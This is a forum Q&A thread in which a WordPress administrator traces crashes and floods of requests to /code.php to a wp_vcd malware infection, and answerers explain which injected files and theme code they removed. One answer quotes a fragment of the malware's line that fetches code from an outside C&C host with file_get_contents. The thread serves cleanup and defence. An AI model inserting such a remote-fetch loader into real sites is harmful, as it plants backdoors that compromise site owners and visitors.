Strange requests from localhost in Apache access logs causing server to crash

Question

I recently setup a Ubuntu 18 testing server on a cloud VPS host and installed the latest Wordpress. Today I went to log in and the site will not load - I get an error Error establishing a database connection

I went through some troubleshooting - added a swap file and blocked XML RPC requests in my .htaccess file, but still I cannot get the site to load. Looking at the apache2/access.log file, I noticed the following:

sudo tail -f /var/log/apache2/access.log 127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-" 127.0.0.1 - - [06/Nov/2019:21:02:31 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-" 127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-" 127.0.0.1 - - [06/Nov/2019:21:02:37 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-" 127.0.0.1 - - [06/Nov/2019:21:02:34 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-" 127.0.0.1 - - [06/Nov/2019:21:02:36 +0000] "GET /code.php HTTP/1.0" 404 23644 "-" "-"

There are thousands of these requests...also, some POST requests:

127.0.0.1 - - [06/Nov/2019:20:48:19 +0000] "POST /wp-cron.php?doing_wp_cron=1573073189.0748620033264160156250 HTTP/1.1" 200 166 "http://DOMAIN-REDACTED/wp-cron.php?doing_wp_cron=1573073189.0748620033 264160156250" "WordPress/5.2.4; http://DOMAIN REDACTED"

Can anyone help me track down the source of these connections? I ran several rootkit scanners on the server and didn't find anything. I've been combing through the web directory looking for anything strange but haven't found anything yet. Googling for code.php is useless. I currently have shut down the Apache service until I can figure out what is up.

PS: This is a test server, I can easily blow it away and create a new one, but I'd really like to do some troubleshooting here and see if I can figure out what the issue is...thanks!

Answer 1

So after some searching it turns out this was a wp_vcd malware infection.

I'll add some details of how I cleaned this in case it helps anyone else.

First, I couldn't login to the WP control panel (as soon as the server received a web request it got flooded with those GET requests from localhost and mysqld would just crash due to insufficient memory). To get around this, I renamed my theme dir to theme.disabled which let me login to the control panel. I installed the Sucuri plugin to do a quick scan/diff on the WP core files and found some files that didn't belong. I deleted the following:

wp-includes/wp-feed.php This file contained a bunch of IP addresses. Apparently the malware records the IPs when users login and suppresses the ads or whatever junk it puts on the site if one of those IPs connects to the site

wp-includes/wp-vcd.php and wp-includes/wp-tmp.php These contained some base64 encoded PHP code

I also inspected my theme's functions.php and here is where I found where the calls to GET code.php were being made -- except they weren't supposed to be hitting localhost, they were supposed to be going out to some C&C server with a .pw domain. I nuked this file and restored a clean version.

At this point it looked like the site was ok and responding properly. I re-enabled the theme and installed some additional security software. I also checked the wp_users table in the database to make sure no admin users had been added. If this wasn't just a test server I'd also run this through Cloudflare or some other WAF solution for extra security.

Answer 2

add a empty /code.php in root folder,

but in theme functions.php

some thing added in top a php block ,

I deleted it

text search in all functions.php for

/code.php" or /code.php' or /code.php

...

            elseif ($tmpcontent = @file_get_contents("http://www.grilns.top/code.php")  ...

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php
/**
 * Theme functions and definitions
 *

of course I deleted the block til

    <?php
    /**
     * Theme functions and definitions
     *

and then maybe /code.php in root no more needed